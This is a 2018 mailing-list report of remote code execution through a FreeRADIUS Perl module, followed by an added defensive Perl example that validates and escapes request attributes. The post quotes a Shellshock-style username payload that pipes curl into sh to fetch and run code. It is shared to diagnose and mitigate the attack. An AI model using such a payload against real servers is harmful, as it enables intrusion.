Remote code execution vulnerability via Perl module

David Herselman dhe at
Tue Jul 3 13:44:07 CEST 2018


We had upgraded our infrastructure to FreeRADIUS 2.2.10 due to us receiving a growing number of authentication requests, starting Fri Jun 29 00:48:59 (GMT), which result in FreeRADIUS downloading and executing code.

Transmitting the following username results in a custom Perl module executing the code:

We have observed another variant of this, which didn't appear to affect us:
	() { :;}; /usr/bin/curl|sh

We've been able to work around the problem by placing the following code near the beginning of our Perl module:
	if ($RAD_REQUEST{'User-Name'} !~ /^[[:alnum:]._-]+$/) { return RLM_MODULE_NOTFOUND; };

Any suggestions regarding possibly cleaning other attributes which may result in code execution on the following line?
	&radiusd::radlog(1, "RAD_REQUEST: $_ = $RAD_REQUEST{$_}");

[davidh at zatjnb01-radius1 ~]# perl -le 'print "u-s_e.r" !~ /^[[:alnum:]._-]+$/ ? "BAD" : "OK"'
[davidh at zatjnb01-radius1 ~]# perl -le 'print "u\\s_e.r" !~ /^[[:alnum:]._-]+$/ ? "BAD" : "OK"'
[davidh at zatjnb01-radius1 ~]# perl -le 'print "u s_e.r" !~ /^[[:alnum:]._-]+$/ ? "BAD" : "OK"'
[davidh at zatjnb01-radius1 ~]# perl -le 'print "u\(s_e.r" !~ /^[[:alnum:]._-]+$/ ? "BAD" : "OK"'

David Herselman
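
An added example, not part of the original message and not FreeRADIUS code: one way to apply the User-Name allowlist above and to escape every attribute before it reaches the log line the message asks about. `log_line` is a hypothetical stand-in for `&radiusd::radlog`, the sample request is constructed, and the `RLM_MODULE_*` values are assumed.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Assumed values; inside rlm_perl the module's own constants are used.
use constant { RLM_MODULE_OK => 2, RLM_MODULE_NOTFOUND => 6 };

# Constructed sample request, including the "() { :;};" prefix quoted above.
my %RAD_REQUEST = (
    'User-Name'          => "() { :;}; /usr/bin/curl|sh",
    'Calling-Station-Id' => "00-11-22-33-44-55\nforged log line",
    'NAS-Identifier'     => "nas01.example",
);

# Allowlist check. \A and \z anchor the whole string; a trailing "$"
# would also accept a value that ends in a newline.
sub username_ok {
    my ($name) = @_;
    return defined $name && $name =~ /\A[[:alnum:]._-]+\z/;
}

# Make any attribute value safe to log: every byte outside printable
# ASCII, and the backslash itself, is written as \xNN, so a value
# cannot inject a newline or terminal control sequence into the log.
sub printable {
    my ($value) = @_;
    $value = '' unless defined $value;
    $value =~ s/([^\x20-\x7e]|\\)/sprintf('\\x%02x', ord $1)/ge;
    return $value;
}

# Hypothetical stand-in for &radiusd::radlog so this runs outside FreeRADIUS.
sub log_line { print "LOG: $_[0]\n" }

sub authorize {
    for my $attr (sort keys %RAD_REQUEST) {
        log_line(sprintf 'RAD_REQUEST: %s = %s',
                 printable($attr), printable($RAD_REQUEST{$attr}));
    }
    # Reject before the name is used for lookups or passed anywhere else.
    return RLM_MODULE_NOTFOUND unless username_ok($RAD_REQUEST{'User-Name'});
    return RLM_MODULE_OK;    # placeholder for the module's normal processing
}

print "authorize returned ", authorize(), "\n";
```

Escaping only protects the log output; attribute values should still never be passed to a shell command line or exported into the environment of a child process.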
